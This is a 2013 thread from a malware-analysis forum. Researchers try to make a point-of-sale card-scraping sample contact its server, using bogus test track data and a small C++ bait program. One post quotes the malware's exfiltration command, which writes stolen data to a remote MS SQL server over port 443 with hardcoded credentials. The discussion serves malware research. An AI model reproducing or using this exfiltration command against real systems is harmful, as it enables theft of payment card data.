A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #17944  by unixfreaxjp
 Thu Jan 31, 2013 2:48 pm
exitthematrix wrote:Does the exe send any TCP data encoded with that key in the registy?
↑This is actually a problem, I think that was the key, but have no crypted data catched to test this key itself.. (expected to be seen in network traffic) since somehow this thig is so shy and didn't send anything yet (even now still running)
I even make the script to run the malware process using net start|stop and it works well to start/stop this two evil services, YET still no networking happen yet, rgds!
 #17946  by bsteo
 Thu Jan 31, 2013 3:01 pm
Do this with Notepad or whatever:
4744870016311111=14091010000000000072
%B4560710014901111^TEST JIM/BOGUS JOS^1107101169940000000710717906968?
And if that doesn't trigger it, just make a bogus "posw32.exe" that can keep those strings in memory, I think that should make it send data.

Idea:

posw32.cpp
Code: Select all
#include <iostream>
#include <conio.h>
#include <windows.h>

using namespace std;

char track1[100] = "%B4560710014901111^TEST JIM/BOGUS JOS^1107101169940000000710717906968?";
char track2[100] = "4744870016311111=14091010000000000072";

int main(){
	cout << track1 << endl;
	cout << track2 << endl;
	getch();
	return 0;
}
 #17955  by unixfreaxjp
 Fri Feb 01, 2013 5:25 am
exitthematrix wrote:Do this with Notepad or whatever:
Nice idea w/thanks for the Notepad stuff.. However it wasn't work, believe me I did try.
I even inject those string to the memory directly :-) and not sending any network. What's wrong with this thing?? Since my environment is still having this case running, pls kindly advice anything to make this boo boo sending calls to mothership, with sincerely regards.
PS: I am on making theat bogus with gcc now.. hope cygwin compiled bogus can fool this boo boo.
 #17957  by unixfreaxjp
 Fri Feb 01, 2013 6:35 am
unixfreaxjp wrote:
exitthematrix wrote:Do this with Notepad or whatever:
However it wasn't work, believe me I did try.
I even flood it :) see the pic below:
Image
The memory also full of those strings:
Image
Really whish to see a successful attempt with traffic.. I will need my testPC for testing other malware, in the mean time I keep it running with these boo boo..
 #17958  by bsteo
 Fri Feb 01, 2013 6:42 am
Very weird. Maybe it refuses to send anything to mothership because is under VM? Or when executet it reads some registry keys to see if that POST software version is installed or not?
 #17961  by unixfreaxjp
 Fri Feb 01, 2013 8:23 am
Very weird indeed, that's why I tried everything I can think of..
exitthematrix wrote:Very weird. Maybe it refuses to send anything to mothership because is under VM?
I never use VM. Always tested in real machine :-)
Or when executet it reads some registry keys to see if that POST software version is installed or not?
The only clue of it detected POSW32.EXE program is:
Image
I didn't see it search registry for posw32 so far (capture every details of it though...)
Furthermoe I still didn't understand the native of infection, tried to seek it myself but the site was cleaned up, only the post in KM was my lead..
 #17962  by bsteo
 Fri Feb 01, 2013 8:50 am
If the malware fetches any data it sends it dirrectly to a MS SQL Server as encoded data (looks like first layer is some kind of base64 with custom alphabet).

svchosts -S MFS1 -U sa -P -Q "INSERT INTO OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=xx.xxx.xxx.xxx,443;uid=sa;pwd=NevertHeL3ss', 'SELECT tab from rec..tbl') SELECT '%s'"

By the way I saw many references to a string "Retalix" in your logs, Retalix is a POS software provider/supplier (http://www.retalix.com).
 #17963  by unixfreaxjp
 Fri Feb 01, 2013 9:09 am
exitthematrix wrote:If the malware fetches any data it sends it dirrectly to a MS SQL Server as encoded data (looks like first layer is some kind of base64 with custom alphabet).
Friend. Please share us "how" did you know all of these by using that sample? Since I can't see any of these in the sample I tested and no traffic reproduced.
Thank's for checking the captured logs, yes I also realized that Relatix is the POS maker.
 #17966  by unixfreaxjp
 Fri Feb 01, 2013 9:47 am
 #17968  by bsteo
 Fri Feb 01, 2013 10:05 am
unixfreaxjp wrote:
exitthematrix wrote:If the malware fetches any data it sends it dirrectly to a MS SQL Server as encoded data (looks like first layer is some kind of base64 with custom alphabet).
Friend. Please share us "how" did you know all of these by using that sample? Since I can't see any of these in the sample I tested and no traffic reproduced.
Thank's for checking the captured logs, yes I also realized that Relatix is the POS maker.
aassfxxx above did a good job but not complete.

http://aassfxxx.infos.st/article21/pos- ... m-scrapper
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 25